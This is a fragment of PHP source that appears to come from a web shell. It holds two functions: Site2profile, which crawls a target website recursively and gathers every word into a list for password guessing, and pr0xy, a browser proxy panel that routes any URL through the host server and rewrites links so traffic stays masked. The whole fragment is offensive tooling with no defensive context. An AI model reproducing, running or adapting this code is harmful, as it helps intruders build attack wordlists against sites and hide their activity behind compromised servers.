function Site2profile($urL, $level) { global $CheckedLinks, $GrabedWords; echo "."; @flush_buffers(); if ($level == 0) { return 0; } if (in_array($urL, $CheckedLinks)) { return null; } $headers = array(); $con = getiT($urL, $headers); if (!strstr($headers['Content-Type'], 'text/')) { return null; } $CheckedLinks[] = $urL; $u = parse_url($urL); $file = !empty($u['path']) ? $u['path'] : '/'; $port = !empty($u['port']) ? ":" . $u['port'] : ''; $dir = str_replace(DIRECTORY_SEPARATOR, '/', dirname($file)); $txt = strip_tags($con); $txt = str_replace("\n", " ", $txt); $twords = explode(" ", $txt); foreach ($twords as $word) { $word = trim($word); if ($word && !in_array($word, $GrabedWords)) { $GrabedWords[] = trim($word); } } $dom = new DOMDocument(); @$dom->loadHTML($con); $dom->preserveWhiteSpace = false; $xpath = new DOMXPath($dom); $hrefs = $xpath->evaluate("/html/body//a"); for ($i = 0; $i < $hrefs->length; $i++) { $href = $hrefs->item($i); $url = $href->getAttribute('href'); if (!empty($url)) { $pre = ''; if (substr($url, 0, 4) != 'http') { $pre = $u['scheme'] . "://" . $u['host'] . $port; if ($url[0] != '/') { $pre .= $dir; } } $url = $pre . $url; Site2profile($url, $level - 1); } } }
function pr0xy() { global $errorbox, $et, $footer, $hcwd; echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='"; if (!!empty($_REQUEST['urL'])) { echo 'http://www.edpsciences.org/htbin/ipaddress'; } else { echo htmlspecialchars($_REQUEST['urL']); } echo "'>{$hcwd}<input type=submit class=buttons value=Go></form>{$et}"; if (!empty($_REQUEST['urL'])) { $u = parse_url($_REQUEST['urL']); $host = $u['host']; $file = !empty($u['path']) ? $u['path'] : '/'; $dir = dirname($file); $con = getiT($_REQUEST['urL']); $s = array("href=mailto" => "HrEf=mailto", "HREF=mailto" => "HrEf=mailto", "href='mailto" => "HrEf=\"mailto", "HREF=\"mailto" => "HrEf=\"mailto", "href=\\'mailto" => "HrEf=\"mailto", "HREF=\\'mailto" => "HrEf=\"mailto", "href=\"http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "href=\\'http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "HREF=\\'http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "href=http" => "HrEf=" . hlinK("seC=px&urL=http"), "HREF=http" => "HrEf=" . hlinK("seC=px&urL=http"), "href=\"" => "HrEf=\"" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "HREF=\"" => "HrEf=\"" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "href=\"" => "HrEf=\\'" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), 'HREF="' => 'HrEf="' . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "href=" => "HrEf=" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "HREF=" => "HrEf=" . hlinK("seC=px&urL=http://{$host}/{$dir}/")); $con = replace_stR($s, $con); echo $con; } }